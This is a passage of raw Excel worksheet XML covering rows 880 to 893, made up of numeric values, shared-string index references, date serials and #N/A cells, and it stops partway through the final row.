    <row r="880" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A880">
        <v>2274</v>
      </c>
      <c r="B880" t="s">
        <v>6795</v>
      </c>
      <c r="C880" t="s">
        <v>318</v>
      </c>
      <c r="D880" t="s">
        <v>6796</v>
      </c>
      <c r="E880" t="s">
        <v>142</v>
      </c>
      <c r="F880" t="s">
        <v>562</v>
      </c>
      <c r="G880" s="1">
        <v>43923</v>
      </c>
      <c r="AF880" t="s">
        <v>6797</v>
      </c>
      <c r="AG880">
        <v>90241</v>
      </c>
      <c r="AH880">
        <v>26</v>
      </c>
      <c r="AJ880">
        <v>420</v>
      </c>
      <c r="AK880" t="s">
        <v>331</v>
      </c>
      <c r="AL880" t="s">
        <v>332</v>
      </c>
      <c r="AM880" t="s">
        <v>6798</v>
      </c>
      <c r="AN880" t="s">
        <v>55</v>
      </c>
      <c r="AO880">
        <v>1974</v>
      </c>
      <c r="AP880" t="s">
        <v>6799</v>
      </c>
      <c r="AQ880" t="s">
        <v>6800</v>
      </c>
      <c r="AR880" t="s">
        <v>6797</v>
      </c>
      <c r="AS880" t="s">
        <v>71</v>
      </c>
      <c r="AT880" t="s">
        <v>58</v>
      </c>
      <c r="AU880" t="e">
        <v>#N/A</v>
      </c>
      <c r="AV880" t="e">
        <v>#N/A</v>
      </c>
      <c r="AW880" t="e">
        <v>#N/A</v>
      </c>
      <c r="AX880" t="e">
        <v>#N/A</v>
      </c>
      <c r="AY880" t="e">
        <v>#N/A</v>
      </c>
      <c r="AZ880" t="e">
        <v>#N/A</v>
      </c>
      <c r="BA880" t="s">
        <v>17109</v>
      </c>
      <c r="BB880" t="s">
        <v>15800</v>
      </c>
      <c r="BC880">
        <v>0</v>
      </c>
      <c r="BD880">
        <v>0</v>
      </c>
    </row>
    <row r="881" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A881">
        <v>2281</v>
      </c>
      <c r="B881" t="s">
        <v>6801</v>
      </c>
      <c r="C881" t="s">
        <v>2308</v>
      </c>
      <c r="D881" t="s">
        <v>6802</v>
      </c>
      <c r="E881" t="s">
        <v>142</v>
      </c>
      <c r="F881" t="s">
        <v>1746</v>
      </c>
      <c r="G881" s="1">
        <v>43990</v>
      </c>
      <c r="AF881" t="s">
        <v>6803</v>
      </c>
      <c r="AG881">
        <v>98414</v>
      </c>
      <c r="AH881">
        <v>33</v>
      </c>
      <c r="AJ881">
        <v>485</v>
      </c>
      <c r="AK881" t="s">
        <v>2313</v>
      </c>
      <c r="AL881" t="s">
        <v>2314</v>
      </c>
      <c r="AM881" t="s">
        <v>6804</v>
      </c>
      <c r="AN881" t="s">
        <v>82</v>
      </c>
      <c r="AO881">
        <v>2019</v>
      </c>
      <c r="AP881">
        <v>951321776</v>
      </c>
      <c r="AQ881" t="s">
        <v>6805</v>
      </c>
      <c r="AR881" t="s">
        <v>6806</v>
      </c>
      <c r="AS881" t="s">
        <v>71</v>
      </c>
      <c r="AT881" t="s">
        <v>86</v>
      </c>
      <c r="AU881" t="e">
        <v>#N/A</v>
      </c>
      <c r="AV881" t="e">
        <v>#N/A</v>
      </c>
      <c r="AW881" t="e">
        <v>#N/A</v>
      </c>
      <c r="AX881" t="e">
        <v>#N/A</v>
      </c>
      <c r="AY881" t="e">
        <v>#N/A</v>
      </c>
      <c r="AZ881" t="e">
        <v>#N/A</v>
      </c>
      <c r="BA881" t="s">
        <v>17114</v>
      </c>
      <c r="BB881">
        <v>0</v>
      </c>
      <c r="BC881">
        <v>0</v>
      </c>
      <c r="BD881">
        <v>0</v>
      </c>
    </row>
    <row r="882" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A882">
        <v>2298</v>
      </c>
      <c r="B882" t="s">
        <v>6807</v>
      </c>
      <c r="C882" t="s">
        <v>477</v>
      </c>
      <c r="D882" t="s">
        <v>6808</v>
      </c>
      <c r="E882" t="s">
        <v>843</v>
      </c>
      <c r="F882" t="s">
        <v>5256</v>
      </c>
      <c r="G882" s="1">
        <v>43866</v>
      </c>
      <c r="AF882" t="s">
        <v>6809</v>
      </c>
      <c r="AG882">
        <v>95529</v>
      </c>
      <c r="AH882">
        <v>29</v>
      </c>
      <c r="AJ882">
        <v>383</v>
      </c>
      <c r="AK882" t="s">
        <v>2986</v>
      </c>
      <c r="AL882" t="s">
        <v>6810</v>
      </c>
      <c r="AM882" t="s">
        <v>6811</v>
      </c>
      <c r="AN882" t="s">
        <v>288</v>
      </c>
      <c r="AO882">
        <v>2019</v>
      </c>
      <c r="AP882">
        <v>81281961919</v>
      </c>
      <c r="AQ882" t="s">
        <v>6812</v>
      </c>
      <c r="AR882" t="s">
        <v>6809</v>
      </c>
      <c r="AS882" t="s">
        <v>71</v>
      </c>
      <c r="AT882" t="s">
        <v>58</v>
      </c>
      <c r="AU882" t="e">
        <v>#N/A</v>
      </c>
      <c r="AV882" t="e">
        <v>#N/A</v>
      </c>
      <c r="AW882" t="e">
        <v>#N/A</v>
      </c>
      <c r="AX882" t="e">
        <v>#N/A</v>
      </c>
      <c r="AY882" t="e">
        <v>#N/A</v>
      </c>
      <c r="AZ882" t="e">
        <v>#N/A</v>
      </c>
      <c r="BA882" t="s">
        <v>17120</v>
      </c>
      <c r="BB882" t="s">
        <v>15814</v>
      </c>
      <c r="BC882">
        <v>0</v>
      </c>
      <c r="BD882">
        <v>0</v>
      </c>
    </row>
    <row r="883" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A883">
        <v>2299</v>
      </c>
      <c r="B883" t="s">
        <v>6813</v>
      </c>
      <c r="C883" t="s">
        <v>579</v>
      </c>
      <c r="D883" t="s">
        <v>6814</v>
      </c>
      <c r="E883" t="s">
        <v>49</v>
      </c>
      <c r="F883" t="s">
        <v>364</v>
      </c>
      <c r="G883" s="1">
        <v>43846</v>
      </c>
      <c r="AF883" t="s">
        <v>6815</v>
      </c>
      <c r="AG883">
        <v>75115</v>
      </c>
      <c r="AH883">
        <v>23</v>
      </c>
      <c r="AJ883">
        <v>364</v>
      </c>
      <c r="AK883" t="s">
        <v>6816</v>
      </c>
      <c r="AL883" t="s">
        <v>6817</v>
      </c>
      <c r="AM883" t="s">
        <v>6818</v>
      </c>
      <c r="AN883" t="s">
        <v>68</v>
      </c>
      <c r="AO883">
        <v>2011</v>
      </c>
      <c r="AP883">
        <v>8125505538</v>
      </c>
      <c r="AQ883" t="s">
        <v>6819</v>
      </c>
      <c r="AR883" t="s">
        <v>6815</v>
      </c>
      <c r="AS883" t="s">
        <v>371</v>
      </c>
      <c r="AT883" t="s">
        <v>72</v>
      </c>
      <c r="AU883" t="e">
        <v>#N/A</v>
      </c>
      <c r="AV883" t="e">
        <v>#N/A</v>
      </c>
      <c r="AW883" t="e">
        <v>#N/A</v>
      </c>
      <c r="AX883" t="e">
        <v>#N/A</v>
      </c>
      <c r="AY883" t="e">
        <v>#N/A</v>
      </c>
      <c r="AZ883" t="e">
        <v>#N/A</v>
      </c>
      <c r="BA883" t="s">
        <v>17121</v>
      </c>
      <c r="BB883" t="s">
        <v>15815</v>
      </c>
      <c r="BC883">
        <v>0</v>
      </c>
      <c r="BD883">
        <v>0</v>
      </c>
    </row>
    <row r="884" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A884">
        <v>2302</v>
      </c>
      <c r="B884" t="s">
        <v>6820</v>
      </c>
      <c r="C884" t="s">
        <v>168</v>
      </c>
      <c r="D884" t="s">
        <v>6821</v>
      </c>
      <c r="E884" t="s">
        <v>412</v>
      </c>
      <c r="F884" t="s">
        <v>6822</v>
      </c>
      <c r="G884" s="1">
        <v>43872</v>
      </c>
      <c r="AF884" t="s">
        <v>6823</v>
      </c>
      <c r="AG884">
        <v>16810</v>
      </c>
      <c r="AH884">
        <v>13</v>
      </c>
      <c r="AJ884">
        <v>161</v>
      </c>
      <c r="AK884" t="s">
        <v>1917</v>
      </c>
      <c r="AL884" t="s">
        <v>1918</v>
      </c>
      <c r="AM884" t="s">
        <v>6824</v>
      </c>
      <c r="AN884" t="s">
        <v>55</v>
      </c>
      <c r="AO884">
        <v>2004</v>
      </c>
      <c r="AP884">
        <v>2187915780</v>
      </c>
      <c r="AQ884" t="s">
        <v>6825</v>
      </c>
      <c r="AR884" t="s">
        <v>6826</v>
      </c>
      <c r="AS884" t="s">
        <v>71</v>
      </c>
      <c r="AT884" t="s">
        <v>58</v>
      </c>
      <c r="AU884" t="e">
        <v>#N/A</v>
      </c>
      <c r="AV884" t="e">
        <v>#N/A</v>
      </c>
      <c r="AW884" t="e">
        <v>#N/A</v>
      </c>
      <c r="AX884" t="e">
        <v>#N/A</v>
      </c>
      <c r="AY884" t="e">
        <v>#N/A</v>
      </c>
      <c r="AZ884" t="e">
        <v>#N/A</v>
      </c>
      <c r="BA884" t="s">
        <v>17123</v>
      </c>
      <c r="BB884" t="s">
        <v>15817</v>
      </c>
      <c r="BC884">
        <v>0</v>
      </c>
      <c r="BD884" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="885" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A885">
        <v>2306</v>
      </c>
      <c r="B885" t="s">
        <v>6827</v>
      </c>
      <c r="C885" t="s">
        <v>157</v>
      </c>
      <c r="D885" t="s">
        <v>6828</v>
      </c>
      <c r="E885" t="s">
        <v>142</v>
      </c>
      <c r="F885" t="s">
        <v>4614</v>
      </c>
      <c r="G885" s="1">
        <v>43857</v>
      </c>
      <c r="AF885" t="s">
        <v>6829</v>
      </c>
      <c r="AG885">
        <v>62271</v>
      </c>
      <c r="AH885">
        <v>16</v>
      </c>
      <c r="AJ885">
        <v>251</v>
      </c>
      <c r="AK885" t="s">
        <v>6830</v>
      </c>
      <c r="AL885" t="s">
        <v>6831</v>
      </c>
      <c r="AM885" t="s">
        <v>6832</v>
      </c>
      <c r="AN885" t="s">
        <v>68</v>
      </c>
      <c r="AO885">
        <v>2019</v>
      </c>
      <c r="AP885">
        <v>85645768448</v>
      </c>
      <c r="AQ885" t="s">
        <v>6833</v>
      </c>
      <c r="AR885" t="s">
        <v>6834</v>
      </c>
      <c r="AS885" t="s">
        <v>179</v>
      </c>
      <c r="AT885" t="s">
        <v>58</v>
      </c>
      <c r="AU885" t="e">
        <v>#N/A</v>
      </c>
      <c r="AV885" t="e">
        <v>#N/A</v>
      </c>
      <c r="AW885" t="e">
        <v>#N/A</v>
      </c>
      <c r="AX885" t="e">
        <v>#N/A</v>
      </c>
      <c r="AY885" t="e">
        <v>#N/A</v>
      </c>
      <c r="AZ885" t="e">
        <v>#N/A</v>
      </c>
      <c r="BA885" t="s">
        <v>17125</v>
      </c>
      <c r="BB885" t="s">
        <v>15819</v>
      </c>
      <c r="BC885" t="s">
        <v>9740</v>
      </c>
      <c r="BD885">
        <v>0</v>
      </c>
    </row>
    <row r="886" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A886">
        <v>2321</v>
      </c>
      <c r="B886" t="s">
        <v>6835</v>
      </c>
      <c r="C886" t="s">
        <v>318</v>
      </c>
      <c r="D886" t="s">
        <v>6836</v>
      </c>
      <c r="E886" t="s">
        <v>131</v>
      </c>
      <c r="F886" t="s">
        <v>6837</v>
      </c>
      <c r="G886" s="1">
        <v>43907</v>
      </c>
      <c r="AF886" t="s">
        <v>6161</v>
      </c>
      <c r="AG886">
        <v>90242</v>
      </c>
      <c r="AH886">
        <v>26</v>
      </c>
      <c r="AJ886">
        <v>420</v>
      </c>
      <c r="AK886" t="s">
        <v>331</v>
      </c>
      <c r="AL886" t="s">
        <v>332</v>
      </c>
      <c r="AM886" t="s">
        <v>6838</v>
      </c>
      <c r="AN886" t="s">
        <v>55</v>
      </c>
      <c r="AO886">
        <v>2008</v>
      </c>
      <c r="AP886" t="s">
        <v>6163</v>
      </c>
      <c r="AQ886" t="s">
        <v>6839</v>
      </c>
      <c r="AR886" t="s">
        <v>6165</v>
      </c>
      <c r="AS886" t="s">
        <v>71</v>
      </c>
      <c r="AT886" t="s">
        <v>58</v>
      </c>
      <c r="AU886" t="e">
        <v>#N/A</v>
      </c>
      <c r="AV886" t="e">
        <v>#N/A</v>
      </c>
      <c r="AW886" t="e">
        <v>#N/A</v>
      </c>
      <c r="AX886" t="e">
        <v>#N/A</v>
      </c>
      <c r="AY886" t="e">
        <v>#N/A</v>
      </c>
      <c r="AZ886" t="e">
        <v>#N/A</v>
      </c>
      <c r="BA886" t="s">
        <v>16816</v>
      </c>
      <c r="BB886" t="s">
        <v>15831</v>
      </c>
      <c r="BC886">
        <v>0</v>
      </c>
      <c r="BD886">
        <v>0</v>
      </c>
    </row>
    <row r="887" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A887">
        <v>2342</v>
      </c>
      <c r="B887" t="s">
        <v>6840</v>
      </c>
      <c r="C887" t="s">
        <v>157</v>
      </c>
      <c r="D887" t="s">
        <v>6841</v>
      </c>
      <c r="E887" t="s">
        <v>142</v>
      </c>
      <c r="F887" t="s">
        <v>143</v>
      </c>
      <c r="G887" s="1">
        <v>43908</v>
      </c>
      <c r="AF887" t="s">
        <v>6842</v>
      </c>
      <c r="AG887">
        <v>61151</v>
      </c>
      <c r="AH887">
        <v>16</v>
      </c>
      <c r="AJ887">
        <v>252</v>
      </c>
      <c r="AK887" t="s">
        <v>6843</v>
      </c>
      <c r="AL887" t="s">
        <v>6844</v>
      </c>
      <c r="AM887" t="s">
        <v>6845</v>
      </c>
      <c r="AN887" t="s">
        <v>68</v>
      </c>
      <c r="AO887">
        <v>2016</v>
      </c>
      <c r="AP887">
        <v>8123170670</v>
      </c>
      <c r="AQ887" t="s">
        <v>6846</v>
      </c>
      <c r="AR887" t="s">
        <v>6842</v>
      </c>
      <c r="AS887" t="s">
        <v>71</v>
      </c>
      <c r="AT887" t="s">
        <v>72</v>
      </c>
      <c r="AU887" t="e">
        <v>#N/A</v>
      </c>
      <c r="AV887" t="e">
        <v>#N/A</v>
      </c>
      <c r="AW887" t="e">
        <v>#N/A</v>
      </c>
      <c r="AX887" t="e">
        <v>#N/A</v>
      </c>
      <c r="AY887" t="e">
        <v>#N/A</v>
      </c>
      <c r="AZ887" t="e">
        <v>#N/A</v>
      </c>
      <c r="BA887" t="s">
        <v>17141</v>
      </c>
      <c r="BB887" t="s">
        <v>17140</v>
      </c>
      <c r="BC887" t="s">
        <v>9621</v>
      </c>
      <c r="BD887">
        <v>0</v>
      </c>
    </row>
    <row r="888" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A888">
        <v>2710</v>
      </c>
      <c r="B888" t="s">
        <v>6847</v>
      </c>
      <c r="C888" t="s">
        <v>477</v>
      </c>
      <c r="D888" t="s">
        <v>6848</v>
      </c>
      <c r="E888" t="s">
        <v>300</v>
      </c>
      <c r="F888" t="s">
        <v>1337</v>
      </c>
      <c r="G888" s="1">
        <v>43934</v>
      </c>
      <c r="H888">
        <v>2528</v>
      </c>
      <c r="I888">
        <v>2528</v>
      </c>
      <c r="J888">
        <v>1</v>
      </c>
      <c r="K888">
        <v>1</v>
      </c>
      <c r="L888">
        <v>1</v>
      </c>
      <c r="M888">
        <v>0</v>
      </c>
      <c r="N888">
        <v>0</v>
      </c>
      <c r="O888">
        <v>0</v>
      </c>
      <c r="P888">
        <v>0</v>
      </c>
      <c r="Q888">
        <v>0</v>
      </c>
      <c r="R888">
        <v>2</v>
      </c>
      <c r="S888">
        <v>0</v>
      </c>
      <c r="T888">
        <v>1</v>
      </c>
      <c r="U888">
        <v>50000</v>
      </c>
      <c r="V888">
        <v>1000</v>
      </c>
      <c r="W888">
        <v>5000</v>
      </c>
      <c r="X888">
        <v>0</v>
      </c>
      <c r="Y888">
        <v>0</v>
      </c>
      <c r="Z888">
        <v>0</v>
      </c>
      <c r="AA888">
        <v>0</v>
      </c>
      <c r="AB888">
        <v>0</v>
      </c>
      <c r="AC888">
        <v>1000</v>
      </c>
      <c r="AD888">
        <v>0</v>
      </c>
      <c r="AE888">
        <v>5000</v>
      </c>
      <c r="AF888" t="s">
        <v>6849</v>
      </c>
      <c r="AG888">
        <v>95546</v>
      </c>
      <c r="AH888">
        <v>29</v>
      </c>
      <c r="AJ888">
        <v>383</v>
      </c>
      <c r="AK888" t="s">
        <v>1339</v>
      </c>
      <c r="AL888" t="s">
        <v>6850</v>
      </c>
      <c r="AM888" t="s">
        <v>6851</v>
      </c>
      <c r="AN888" t="s">
        <v>68</v>
      </c>
      <c r="AO888">
        <v>2019</v>
      </c>
      <c r="AP888" t="s">
        <v>6852</v>
      </c>
      <c r="AQ888" t="s">
        <v>6853</v>
      </c>
      <c r="AR888" t="s">
        <v>6849</v>
      </c>
      <c r="AS888" t="s">
        <v>71</v>
      </c>
      <c r="AT888" t="s">
        <v>58</v>
      </c>
      <c r="AU888">
        <v>25</v>
      </c>
      <c r="AV888">
        <v>1</v>
      </c>
      <c r="AW888">
        <v>5</v>
      </c>
      <c r="AX888">
        <v>2</v>
      </c>
      <c r="AY888">
        <v>4</v>
      </c>
      <c r="AZ888">
        <v>3</v>
      </c>
      <c r="BA888" t="s">
        <v>17284</v>
      </c>
      <c r="BB888" t="s">
        <v>15907</v>
      </c>
      <c r="BC888" t="s">
        <v>10010</v>
      </c>
      <c r="BD888" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="889" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A889">
        <v>2711</v>
      </c>
      <c r="B889" t="s">
        <v>6854</v>
      </c>
      <c r="C889" t="s">
        <v>477</v>
      </c>
      <c r="D889" t="s">
        <v>6855</v>
      </c>
      <c r="E889" t="s">
        <v>142</v>
      </c>
      <c r="F889" t="s">
        <v>1564</v>
      </c>
      <c r="G889" s="1">
        <v>43935</v>
      </c>
      <c r="H889">
        <v>2536</v>
      </c>
      <c r="I889">
        <v>2536</v>
      </c>
      <c r="J889">
        <v>1</v>
      </c>
      <c r="K889">
        <v>0</v>
      </c>
      <c r="L889">
        <v>3</v>
      </c>
      <c r="M889">
        <v>0</v>
      </c>
      <c r="N889">
        <v>0</v>
      </c>
      <c r="O889">
        <v>0</v>
      </c>
      <c r="P889">
        <v>0</v>
      </c>
      <c r="Q889">
        <v>0</v>
      </c>
      <c r="R889">
        <v>4</v>
      </c>
      <c r="S889">
        <v>0</v>
      </c>
      <c r="T889">
        <v>1</v>
      </c>
      <c r="U889">
        <v>100000</v>
      </c>
      <c r="V889">
        <v>0</v>
      </c>
      <c r="W889">
        <v>15000</v>
      </c>
      <c r="X889">
        <v>0</v>
      </c>
      <c r="Y889">
        <v>0</v>
      </c>
      <c r="Z889">
        <v>0</v>
      </c>
      <c r="AA889">
        <v>0</v>
      </c>
      <c r="AB889">
        <v>0</v>
      </c>
      <c r="AC889">
        <v>4000</v>
      </c>
      <c r="AD889">
        <v>0</v>
      </c>
      <c r="AE889">
        <v>5000</v>
      </c>
      <c r="AF889" t="s">
        <v>6856</v>
      </c>
      <c r="AG889">
        <v>95546</v>
      </c>
      <c r="AH889">
        <v>29</v>
      </c>
      <c r="AJ889">
        <v>383</v>
      </c>
      <c r="AK889" t="s">
        <v>1339</v>
      </c>
      <c r="AL889" t="s">
        <v>6850</v>
      </c>
      <c r="AM889" t="s">
        <v>6857</v>
      </c>
      <c r="AN889" t="s">
        <v>55</v>
      </c>
      <c r="AO889">
        <v>2018</v>
      </c>
      <c r="AP889" t="s">
        <v>6858</v>
      </c>
      <c r="AQ889" t="s">
        <v>6859</v>
      </c>
      <c r="AR889" t="s">
        <v>6856</v>
      </c>
      <c r="AS889" t="s">
        <v>71</v>
      </c>
      <c r="AT889" t="s">
        <v>58</v>
      </c>
      <c r="AU889">
        <v>25</v>
      </c>
      <c r="AV889">
        <v>1</v>
      </c>
      <c r="AW889">
        <v>5</v>
      </c>
      <c r="AX889">
        <v>5</v>
      </c>
      <c r="AY889">
        <v>9</v>
      </c>
      <c r="AZ889">
        <v>1</v>
      </c>
      <c r="BA889" t="s">
        <v>17285</v>
      </c>
      <c r="BB889" t="s">
        <v>15908</v>
      </c>
      <c r="BC889" t="s">
        <v>9698</v>
      </c>
      <c r="BD889">
        <v>0</v>
      </c>
    </row>
    <row r="890" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A890">
        <v>2719</v>
      </c>
      <c r="B890" t="s">
        <v>6860</v>
      </c>
      <c r="C890" t="s">
        <v>168</v>
      </c>
      <c r="D890" t="s">
        <v>6861</v>
      </c>
      <c r="E890" t="s">
        <v>6862</v>
      </c>
      <c r="F890" t="s">
        <v>6863</v>
      </c>
      <c r="G890" s="1">
        <v>44221</v>
      </c>
      <c r="H890">
        <v>2582</v>
      </c>
      <c r="I890">
        <v>2582</v>
      </c>
      <c r="J890">
        <v>2</v>
      </c>
      <c r="K890">
        <v>1</v>
      </c>
      <c r="L890">
        <v>1</v>
      </c>
      <c r="M890">
        <v>3</v>
      </c>
      <c r="N890">
        <v>0</v>
      </c>
      <c r="O890">
        <v>0</v>
      </c>
      <c r="P890">
        <v>4</v>
      </c>
      <c r="Q890">
        <v>0</v>
      </c>
      <c r="R890">
        <v>0</v>
      </c>
      <c r="S890">
        <v>1</v>
      </c>
      <c r="T890">
        <v>1</v>
      </c>
      <c r="U890">
        <v>350000</v>
      </c>
      <c r="V890">
        <v>60000</v>
      </c>
      <c r="W890">
        <v>1200</v>
      </c>
      <c r="X890">
        <v>800</v>
      </c>
      <c r="Y890">
        <v>0</v>
      </c>
      <c r="Z890">
        <v>0</v>
      </c>
      <c r="AA890">
        <v>0</v>
      </c>
      <c r="AB890">
        <v>0</v>
      </c>
      <c r="AC890">
        <v>0</v>
      </c>
      <c r="AD890">
        <v>1</v>
      </c>
      <c r="AE890">
        <v>0</v>
      </c>
      <c r="AF890" t="s">
        <v>6864</v>
      </c>
      <c r="AG890">
        <v>16820</v>
      </c>
      <c r="AH890">
        <v>13</v>
      </c>
      <c r="AJ890">
        <v>161</v>
      </c>
      <c r="AK890" t="s">
        <v>1832</v>
      </c>
      <c r="AL890" t="s">
        <v>1833</v>
      </c>
      <c r="AM890" t="s">
        <v>6865</v>
      </c>
      <c r="AN890" t="s">
        <v>55</v>
      </c>
      <c r="AO890">
        <v>2005</v>
      </c>
      <c r="AP890" t="s">
        <v>6866</v>
      </c>
      <c r="AQ890" t="s">
        <v>6867</v>
      </c>
      <c r="AR890" t="s">
        <v>6868</v>
      </c>
      <c r="AS890" t="s">
        <v>71</v>
      </c>
      <c r="AT890" t="s">
        <v>58</v>
      </c>
      <c r="AU890">
        <v>26</v>
      </c>
      <c r="AV890">
        <v>1</v>
      </c>
      <c r="AW890">
        <v>150</v>
      </c>
      <c r="AX890">
        <v>315</v>
      </c>
      <c r="AY890">
        <v>75</v>
      </c>
      <c r="AZ890">
        <v>113</v>
      </c>
      <c r="BA890" t="s">
        <v>16603</v>
      </c>
      <c r="BB890" t="s">
        <v>14320</v>
      </c>
      <c r="BC890">
        <v>0</v>
      </c>
      <c r="BD890" t="s">
        <v>11177</v>
      </c>
    </row>
    <row r="891" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A891">
        <v>2734</v>
      </c>
      <c r="B891" t="s">
        <v>6018</v>
      </c>
      <c r="C891" t="s">
        <v>74</v>
      </c>
      <c r="D891" t="s">
        <v>6869</v>
      </c>
      <c r="E891" t="s">
        <v>2310</v>
      </c>
      <c r="F891" t="s">
        <v>6870</v>
      </c>
      <c r="G891" s="1">
        <v>44286</v>
      </c>
      <c r="H891">
        <v>2736</v>
      </c>
      <c r="I891">
        <v>2736</v>
      </c>
      <c r="J891">
        <v>4</v>
      </c>
      <c r="K891">
        <v>0</v>
      </c>
      <c r="L891">
        <v>3</v>
      </c>
      <c r="M891">
        <v>8</v>
      </c>
      <c r="N891">
        <v>0</v>
      </c>
      <c r="O891">
        <v>0</v>
      </c>
      <c r="P891">
        <v>0</v>
      </c>
      <c r="Q891">
        <v>36</v>
      </c>
      <c r="R891">
        <v>38</v>
      </c>
      <c r="S891">
        <v>0</v>
      </c>
      <c r="T891">
        <v>2</v>
      </c>
      <c r="U891">
        <v>10000</v>
      </c>
      <c r="V891">
        <v>0</v>
      </c>
      <c r="W891">
        <v>1500</v>
      </c>
      <c r="X891">
        <v>1500</v>
      </c>
      <c r="Y891">
        <v>0</v>
      </c>
      <c r="Z891">
        <v>0</v>
      </c>
      <c r="AA891">
        <v>0</v>
      </c>
      <c r="AB891">
        <v>5000</v>
      </c>
      <c r="AC891">
        <v>500</v>
      </c>
      <c r="AD891">
        <v>0</v>
      </c>
      <c r="AE891">
        <v>10000</v>
      </c>
      <c r="AF891" t="s">
        <v>6020</v>
      </c>
      <c r="AG891">
        <v>59186</v>
      </c>
      <c r="AH891">
        <v>14</v>
      </c>
      <c r="AJ891">
        <v>204</v>
      </c>
      <c r="AK891" t="s">
        <v>2418</v>
      </c>
      <c r="AL891" t="s">
        <v>2419</v>
      </c>
      <c r="AM891" t="s">
        <v>6871</v>
      </c>
      <c r="AN891" t="s">
        <v>55</v>
      </c>
      <c r="AO891">
        <v>2010</v>
      </c>
      <c r="AP891" t="s">
        <v>6872</v>
      </c>
      <c r="AQ891" t="s">
        <v>6020</v>
      </c>
      <c r="AR891" t="s">
        <v>6020</v>
      </c>
      <c r="AS891" t="s">
        <v>71</v>
      </c>
      <c r="AT891" t="s">
        <v>58</v>
      </c>
      <c r="AU891">
        <v>25</v>
      </c>
      <c r="AV891">
        <v>2</v>
      </c>
      <c r="AW891">
        <v>150</v>
      </c>
      <c r="AX891">
        <v>200</v>
      </c>
      <c r="AY891">
        <v>56</v>
      </c>
      <c r="AZ891">
        <v>52</v>
      </c>
      <c r="BA891" t="s">
        <v>16744</v>
      </c>
      <c r="BB891" t="s">
        <v>14795</v>
      </c>
      <c r="BC891">
        <v>0</v>
      </c>
      <c r="BD891" t="s">
        <v>10663</v>
      </c>
    </row>
    <row r="892" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A892">
        <v>2724</v>
      </c>
      <c r="B892" t="s">
        <v>6873</v>
      </c>
      <c r="C892" t="s">
        <v>168</v>
      </c>
      <c r="D892" t="s">
        <v>6874</v>
      </c>
      <c r="E892" t="s">
        <v>142</v>
      </c>
      <c r="F892" t="s">
        <v>6875</v>
      </c>
      <c r="G892" s="1">
        <v>44160</v>
      </c>
      <c r="H892">
        <v>2804</v>
      </c>
      <c r="I892">
        <v>2804</v>
      </c>
      <c r="J892">
        <v>2</v>
      </c>
      <c r="K892">
        <v>0</v>
      </c>
      <c r="L892">
        <v>2</v>
      </c>
      <c r="M892">
        <v>0</v>
      </c>
      <c r="N892">
        <v>0</v>
      </c>
      <c r="O892">
        <v>0</v>
      </c>
      <c r="P892">
        <v>0</v>
      </c>
      <c r="Q892">
        <v>0</v>
      </c>
      <c r="R892">
        <v>3</v>
      </c>
      <c r="S892">
        <v>0</v>
      </c>
      <c r="T892">
        <v>0</v>
      </c>
      <c r="U892">
        <v>35000</v>
      </c>
      <c r="V892">
        <v>0</v>
      </c>
      <c r="W892">
        <v>2500</v>
      </c>
      <c r="X892">
        <v>0</v>
      </c>
      <c r="Y892">
        <v>0</v>
      </c>
      <c r="Z892">
        <v>0</v>
      </c>
      <c r="AA892">
        <v>0</v>
      </c>
      <c r="AB892">
        <v>0</v>
      </c>
      <c r="AC892">
        <v>3000</v>
      </c>
      <c r="AD892">
        <v>0</v>
      </c>
      <c r="AE892">
        <v>0</v>
      </c>
      <c r="AF892" t="s">
        <v>6876</v>
      </c>
      <c r="AG892">
        <v>41353</v>
      </c>
      <c r="AH892">
        <v>13</v>
      </c>
      <c r="AJ892">
        <v>175</v>
      </c>
      <c r="AK892" t="s">
        <v>6877</v>
      </c>
      <c r="AL892" t="s">
        <v>6878</v>
      </c>
      <c r="AM892" t="s">
        <v>6879</v>
      </c>
      <c r="AN892" t="s">
        <v>55</v>
      </c>
      <c r="AO892">
        <v>2012</v>
      </c>
      <c r="AP892">
        <v>2127873079</v>
      </c>
      <c r="AQ892" t="s">
        <v>6880</v>
      </c>
      <c r="AR892" t="s">
        <v>6881</v>
      </c>
      <c r="AS892" t="s">
        <v>71</v>
      </c>
      <c r="AT892" t="s">
        <v>58</v>
      </c>
      <c r="AU892">
        <v>25</v>
      </c>
      <c r="AV892">
        <v>2</v>
      </c>
      <c r="AW892">
        <v>42</v>
      </c>
      <c r="AX892">
        <v>63</v>
      </c>
      <c r="AY892">
        <v>8</v>
      </c>
      <c r="AZ892">
        <v>1</v>
      </c>
      <c r="BA892" t="s">
        <v>16832</v>
      </c>
      <c r="BB892" t="s">
        <v>15159</v>
      </c>
      <c r="BC892" t="s">
        <v>12232</v>
      </c>
      <c r="BD892" t="s">
        <v>10018</v>
      </c>
    </row>
    <row r="893" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A893">
        <v>2735</v>
      </c>
      <c r="B893" t="s">
        <v>6882</v>
      </c>
      <c r="C893" t="s">
        <v>168</v>
      </c>
      <c r="D893" t="s">
        <v>6883</v>
      </c>
      <c r="E893" t="s">
        <v>142</v>
      </c>
      <c r="F893" t="s">
        <v>6884</v>
      </c>
      <c r="G893" s="1">
        <v>44074</v>
      </c>
      <c r="H893">
        <v>2858</v>
      </c>
      <c r="I893">
        <v>2858</v>
      </c>
      <c r="J893">
        <v>1</v>
      </c>
      <c r="K893">
        <v>0</v>
      </c>
      <c r="L893">
        <v>2</v>
      </c>
      <c r="M893">
        <v>0</v>
      </c>
      <c r="N893">
        <v>0</v>
      </c>
      <c r="O893">
        <v>0</v>
      </c>
      <c r="P893">
        <v>0</v>
      </c>
      <c r="Q893">
        <v>2</v>
      </c>
      <c r="R893">
        <v>0</v>
      </c>
      <c r="S893">
        <v>0</v>
      </c>
      <c r="T893">
        <v>0</v>
      </c>
      <c r="U893">
        <v>100000</v>
      </c>
      <c r="V893">
        <v>0</v>
      </c>
      <c r="W893">
        <v>6000</v>
